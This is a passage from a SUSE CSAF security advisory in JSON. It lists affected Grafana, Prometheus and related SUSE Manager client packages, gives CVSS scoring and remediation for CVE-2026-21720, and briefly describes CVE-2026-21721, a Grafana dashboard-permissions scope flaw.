"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-21720",
"url": "https://www.suse.com/security/cve/CVE-2026-21720"
},
{
"category": "external",
"summary": "SUSE Bug 1257349 for CVE-2026-21720",
"url": "https://bugzilla.suse.com/1257349"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "important"
}
],
"title": "CVE-2026-21720"
},
{
"cve": "CVE-2026-21721",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-21721"
}
],
"notes": [
{
"category": "general",
"text": "The dashboard permissions API does not verify the target dashboard scope and only checks the dashboards.permissions:* action. As a result, a user who has permission management rights on one dashboard can read and modify permissions on other dashboards. This is an organization-internal privilege escalation.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
